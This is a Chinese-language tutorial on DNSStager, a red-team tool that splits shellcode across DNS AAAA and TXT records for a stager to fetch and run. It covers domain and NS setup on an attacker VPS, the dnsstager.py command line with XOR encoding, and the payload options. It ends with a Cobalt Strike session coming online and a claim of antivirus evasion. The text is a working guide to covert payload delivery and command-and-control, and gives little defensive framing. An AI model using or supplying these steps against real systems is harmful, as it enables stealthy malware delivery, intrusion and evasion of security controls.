DNSStager-DNS分离shellcode
1.DNSStager介绍
类似于shellcode分离免杀的思路,DNSStager是用来帮助红队人员执行在DNS隐藏多段shellcode,通过多次请求dns查询,达到加载shellcode内容然后上线的目的。
其原理是:将你申请的根域名(如gendns.tk)作为ns服务器,提供test.gendns.tk子域名的解析服务,然后工具在本地对test.gendns.tk建立多个AAAA记录的IPV6地址,生成运行程序循环请求这些个记录,拼接AAAA记录作为shellcode加载,从而达到上线的目的。
优点:
1加载shellcode为外部dns请求,防火墙很少拦截。
2使用xor加密程序运行,免杀部分AV。
工具基于多个DNS记录,如开源工具 IPv6 和TXT 并再注入到内存中并运行它。
官方地址:https://shells.systems/unveiling-dnsstager-a-tool-to-hide-your-payload-in-dns/
DNSStager将创建一个伪造的DNS服务器,该服务器将根据AAAA和TXT记录解析您的域的伪造地址,这些地址将呈现您的有效负载的一部分,该净荷已编码/加密并可供代理使用。
2.DNSStager使用条件
要安装DNSStager,您需要首先使用以下命令从官方存储库中克隆它:
git clone https://github.com/mhaskar/DNSStager然后使用以下命令安装DNSStager的所有python要求:
pip3 install -r requirements.txt此外需要注意的是,需要禁用本机的systemd-resolved服务:
sudo service systemd-resolved stop
sudo systemctl disable systemd-resolved环境可选c。
golang;c需要安装ming-w64(这里推荐ubuntu、kali系统,centos上楼主尝试多次安装ming-w64均失败):
golang需要GoLang version 1.16.3,并安装
- golang.org/x/sys
- github.com/miekg/dns
这两个第三方依赖库(golang扩展目前还未复现成功,go-1.16各种坑)。
3.域名的配置
使用DNSStager作为shellcode存储媒介,当然要有一个域名,可在美国freenom等服务商处申请(楼主各种失败,最后只能花钱买一个),申请好后需要解析NS
到第三方域名服务商,例如dnspod,cloudflare,在这些地方添加子域名test.gendns.tk的NS记录到你自己的vps才可以。
前提:VPS对外开放53端口的UDP数据,提供NS查询。
具体如何使用cloudflare请参考《实战填坑 | CS使用CDN隐藏C2》
https://mp.weixin.qq.com/s/B30Unfh5yAN4A151P1gsMQ
CDN配置以cloudflare为例,在DNS选项处添加NS记录:
最后的效果:
在你填写的vps中下载工具,使用方法(payload以x64/c/ipv6为例):
dnsstager.py --domain test.gendns.tk --payload x64/c/ipv6 --output /home/a.exe --prefix cloud-srv- --shellcode_path /home/DNSStager/payload.bin --sleep 1 --xorkey 0x10其中payload有多种,使用python 3 dnsstager.py –payloads查看:
x64/c/ipv6 Resolve your payload as IPV6 addresses xored with custom key via compiled x64 C code
x86/c/ipv6 Resolve your payload as IPV6 addresses xored with custom key via compiled x86 C code
x64/golang/txt Resolve your payload as TXT records encoded using base64 compiled x64 GoLang code
x64/golang/ipv6 Resolve your payload as IPV6 addresses encoded with custom key using byte add encoding via compiled x64 GoLang code
x86/golang/txt Resolve your payload as TXT records encoded using base64 compiled x86 GoLang code
x86/golang/ipv6 Resolve your payload as IPV6 addresses encoded with custom key using byte add encoding via compiled x86 GoLang code注意:其中--prefix cdn参数的cloud-srv-可自由配置,就是在test.gendns.tk之前添加NS子域名,作为多个shellcode分片存储媒介。
4.工具的使用
在运行工具后会在本机监听53端口:
操作之前使用dig命令可检查ns域名:dig AAAA cloud-srv-0.test.gendns.tk
未成功时:
已经插入了AAAA记录:
使用dig命令查询会看到记录,运行程序后监听端也会看到:
提示共需要发送56次dns查询请求才能加载完毕shellcode:DNSStager will send 56 DNS requests to get the full payload,意为在vps建立了56个cloud-srv-*.test.gendns.tk NS记录。
wireshark抓包可见请求AAAA记录:
最后CS上线:
免杀效果
腾讯云开发者
